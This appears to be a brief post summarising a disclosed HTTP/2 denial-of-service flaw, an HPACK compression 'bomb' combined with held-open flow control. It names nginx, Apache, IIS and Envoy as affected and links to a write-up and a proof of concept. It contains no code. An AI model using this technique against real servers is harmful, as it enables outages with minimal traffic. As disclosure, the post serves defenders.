The author describes a denial-of-service (DoS) vulnerability in HTTP/2 related to the processing of compressed headers (HPACK) and flow control mechanisms. The core issue is that specially crafted headers can force the server to consume excessive memory during processing, even when the amount of incoming data is very small. This affects widely used servers such as nginx, Apache, IIS, and Envoy.

The attack combines two techniques: a header compression "bomb" and keeping the connection open. First, the server is forced to allocate large amounts of memory while parsing headers, and then this memory is not released due to flow control behavior. As a result, even a single client can exhaust server resources and cause service unavailability with minimal traffic.

📎 Article: https://blog.calif.io/p/codex-discovered-a-hidden-http2-bomb

⚙️ PoC: https://github.com/califio/publications/tree/main/MADBugs/http2-bomb

HTTP/2 Bomb: a Hidden DoS Attack via HPACK and Flow Control